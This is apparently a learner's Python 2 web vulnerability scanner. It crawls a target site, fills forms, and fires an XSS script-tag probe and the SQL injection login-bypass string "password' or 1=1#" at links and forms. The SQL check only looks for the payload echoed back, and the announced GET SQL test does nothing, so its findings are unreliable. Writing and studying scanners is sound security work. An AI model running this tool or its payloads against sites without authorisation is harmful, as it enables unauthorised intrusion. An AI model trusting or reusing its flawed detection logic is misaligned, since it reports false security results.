#!usr/bin/env python

import requests
import re
import urlparse
from BeautifulSoup import BeautifulSoup

class Scanner:
    def __init__(self, url, ignore_links):
        self.session = requests.Session()
        self.target_url = url
        self.target_links = []
        self.links_to_ignore = ignore_links

    def extract_links_from(self, url):
        response = self.session.get(url)
        return re.findall('(?:href=")(.*?)"', response.content)

    def crawl(self, url=None):
        # find all possible links after /
        if url == None:
            url = self.target_url
        href_links = self.extract_links_from(url)
        for link in href_links:
            link = urlparse.urljoin(url, link)
            if "#" in link:
                link = link.split("#")[0]
            # make sure to change the http or https for the below argument to work
            if self.target_url in link and link not in self.target_links and link not in self.links_to_ignore:
                self.target_links.append(link)
                print(link)
                self.crawl(link)

    def extract_forms(self, url):
        response = self.session.get(url)
        parsed_html = BeautifulSoup(response.content)
        return parsed_html.findAll("form")

    def submit_form(self, form, value, url):
        action = form.get("action")
        post_url = urlparse.urljoin(url, action)
        method = form.get("method")

        input_list = form.findAll("input")
        post_data = {}
        for input in input_list:
            input_name = input.get("name")
            input_type = input.get("type")
            input_value = input.get("value")
            if input_type == "text":
                input_value = value

            post_data[input_name] = input_value
        if method == "post":
            return self.session.post(post_url, data=post_data)
        return self.session.get(post_url, params=post_data)

    def run_scanner(self):
        for link in self.target_links:
            forms = self.extract_forms(link)
            for form in forms:
                print("[+] Testing form in " + link)
                is_vulnerable_to_XSS = self.test_xss_in_form(form, link)
                if is_vulnerable_to_XSS:
                    print("\n\n[+] XSS discovered in " + link + " in the following form")
                    print(form)
            if "=" in link:
                print("[+] Testing " + link)
                is_vulnerable_to_XSS = self.test_XSS_in_link(link)
                if is_vulnerable_to_XSS:
                    print("\n\n[+] discovered XSS in " + link)
                print("[+] Testing for GET SQL in " + link)

            for form in forms:
                print("Testing POST SQL injection attack concerning bypass login in " + link)
                is_vulnerable_to_SQL = self.test_sql_injection_with_OR(form, link)
                if is_vulnerable_to_SQL:
                    # better idea is to see if the return HTML code is 100 or 200
                    print("\n\n[+] discovered login bypass SQL in " + link)
                    print(form)

    def test_XSS_in_link(self, url):
        xss_test_script = "<sCript>alert('test')</scriPt>"
        url = url.replace("=", "=" + xss_test_script)
        response = self.session.get(url)
        return xss_test_script in response.content

    def test_xss_in_form(self, form, url):
        xss_test_script = "<sCript>alert('test')</scriPt>"
        response = self.submit_form(form, xss_test_script, url)
        return xss_test_script in response.content

    def test_sql_injection_with_OR(self, form, url):
        sql_test_script = "password' or 1=1#"
        response = self.submit_form(form, sql_test_script, url)
        return sql_test_script in response.content












